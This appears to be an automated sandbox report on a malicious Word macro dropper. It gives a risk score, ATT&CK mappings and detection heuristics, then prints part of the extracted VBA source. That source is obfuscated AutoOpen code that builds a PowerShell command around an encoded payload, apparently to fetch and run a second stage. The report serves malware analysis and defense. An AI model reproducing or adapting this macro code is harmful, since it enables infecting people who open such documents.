MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The AutoOpen macro is configured to execute, and it utilizes the Shell() function, indicating an attempt to run arbitrary commands. This behavior is consistent with a macro-based dropper designed to download and execute a second-stage payload.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6592509-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6592509-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8688 bytes |

SHA-256: 1bf305c451ad53ba3cbaf3e62dab123ce06d443b1df5873271306c6db9912ec8

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "PDUztJJrVsWOE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WbjwawIAYnKT"
Function JpdbaC()
On Error Resume Next
hbHka = 82372
CdhrX = wMLhc
hNWDbD = Sin(48669)
fjtiq = 13895
ciWJjv = 21002
wzidTb = CDate(23054)
PVmTubwZr = "Hell ." + Chr(40) + " " + "$s" + "HEllId[1" + "]" + Chr(43) + "$sh" + "EL" + "liD[13"
odAMIs = 20756
Trrfaf = wwMpO
zwqJOD = Sin(22552)
bCwMr = 46572
wNfAWS = 64540
YwDcAh = CDate(31728)
bPkoOJWbU = "]" + Chr(43) + "'x'" + Chr(41) + Chr(40) + Chr(40) + " '12" + "2-26}" + "41P3" + "6P9" + "9P48P5" + "9_41>" + "115}4" + "9H60_52_"
NNOwBl = 8423
hhYtv = CDate(80783)
NNWiLi = MmRzO
EklRPo = 17906
jfLtr = Sin(92711)
hkOzBn = 18642
siWiaOcJiVU = "59P61" + "H42P126-" + "16>5" + "9e42e1" + "12G" + "9>59t6" + "0_" + "29_" + "50_55P" + "59P4" + "8%4" + "2_101H"
jiCfIc = 57272
tPwjQ = CDate(44415)
lwvIfd = jKruJ
mnUGI = 68992
juVih = Sin(50232)
krvOz = 83258
zhscXT = "122" + "e23" + ">13e52G9" + "9t121e54" + "%42_4" + "2P46-10" + "0-11" + "3t113t4"
VXrMi = 68610
doAGwN = CDate(34582)
uhZAsZ = uBjIoc
loNMiA = 86693
ANCBj = 76010
sNTDDl = Sin(25199)
OqmoKh = "1%41e" + "41H112}" + "58_63e" + "42}63t60" + "%63t" + "45" + "-59t11" + "2%" + "36_" + "115"
uKDzPS = 61914
AuUIE = CDate(88666)
nEWMCI = vMQITp
ZpYsjY = 66865
cuwOZp = 77356
EDYVQ = Sin(97309)
npbPEUz = "e56}50>" + "49H" + "49" + "-44P55" + "G48>57" + "}1" + "12G" + "61>49"
wOPiz = 23568
zJFXo = CDate(4723)
FPPtKM = FtNPr
EvUTb = 51431
FwkrUI = 80462
FMXzX = Sin(59911)
wFuQzAL = "_51" + "H1" + "13-53}1" + "05_110-4" + "1G11" + "3e3" + "0>54t42G" + "42" + "P46"
mOwmY = 62809
zzEpN = CDate(77390)
PYthR = rzltzH
sWPrM = 79275
obvpCV = 679
nUozq = Sin(8823)
YORNQHnoaS = "G100%1" + "13-113" + ">42}" + "54%59G6" + "1G42}44H" + "50}" + "108P10" + "6t112" + "t61-49" + ">51" + "H113"
JpdbaC = PVmTubwZr + bPkoOJWbU + siWiaOcJiVU + zhscXT + OqmoKh + npbPEUz + wFuQzAL + YORNQHnoaS
vXLBw = 1892
ipqGK = CDate(21916)
Efzqjt = AbHJk
DiwwH = 5652
JUdqu = 76675
ctTwd = Sin(86134)
End Function

Function OJBjCmhc()
On Error Resume Next
FqzrPz = 98891
NlGLBV = CDate(90558)
YjjrmA = Tvrfso
HKjsM = 40517
wXzjcO = 5421
VWmzw = Sin(41255)
LjIUaon = "e57t" + "52P" + "17" + "%2" + "5}41t113" + "P30P" + "54H42}" + "42>46H10" + "0%113G"
lATTKa = 35483
QJCwbk = CDate(68240)
kBhoS = lAWBiF
VtuplU = 95665
iSzpP = 73488
SJjcV = Sin(72679)
UtZYOzwjL = "113P63" + "e51G4" + "6P50P63P" + "52H56}" + "11" + "2H61>" + "49H" + "51" + "H112e6" + "0H44" + "G113G" + "10"
fiYWJC = 82099
onQnj = CDate(4026)
EvoFw = NVIPT
EswcEj = 16370
TQUul = 45966
CpjjA = Sin(19619)
iwsjuOiNKP = "9_7" + "e44e4t1" + "13" + "H30t5" + "4t42}42" + "_46t1"
oowZc = 82098
WDHhk = CDate(33548)
PKdtcV = RvwKN
Timau = 74682
tjHJfR = 39532
rOAXZj = Sin(28767)
dHnNz = "00e113-" + "11" + "3P54" + "t39" + "}58t44>4" + "9G58t49" + "-51G112" + "t4" + "9H"
jSMCs = 36108
SmuVPw = CDate(15155)
UikiKz = OEQlff
uYlhD = 87013
UrYoW = 51566
EAnUO = Sin(87221)
doIHdYhfrR = "44" + "%57H113" + "e9%63H58" + "-7}103H2" + "7%113e" + "30}54t42" + "%42H4" + "6}100P" + "11" + "3_113-" + "41t41t"
rLnuEj = 52693
AjHICO = CDate(34014)
HThllP = cRjGJ
cRRmJ = 54885
rvEmTZ = 35809
zGzum = Sin(24173)
AMbquZU = "41t112" + "-61G3" + "9}61t50t" + "59e115" + ">56>55e5" + "0P5" + "1}112H6" + "1G49" + "-5" + "1}113" + "P102P10%" + "56_10"
iBZXZG = 7844
zFQjUt = CDate(52329)
zJzjww = njCoHi
jMXrw = 33064
jswvP = 57075
GnMnK = Sin(13413)
QjSkr = "e1" + "0P22-113" + "-121}11" + "2P13G46>" + "50%5" + "5-42" + "H118H1" + "21>" + "30-121}1" + "19}101-1"
bMwrC = 91068
saIljZ = CDate(94255)
ETMCVI = IWpbk
ObTUDq = 29077
OHmuC = 61218
QmMBW = Sin(59865)
OMGEIk = "22}41" + "e12" + "G20%" + "126%99" + "G126}" + "121_111%" + "102"
LSJpUh = 34557
pFVGl = CDate(20986)
qLQJd = QLSNM
kdaOvi = 67327
usIArm = ... (truncated)
```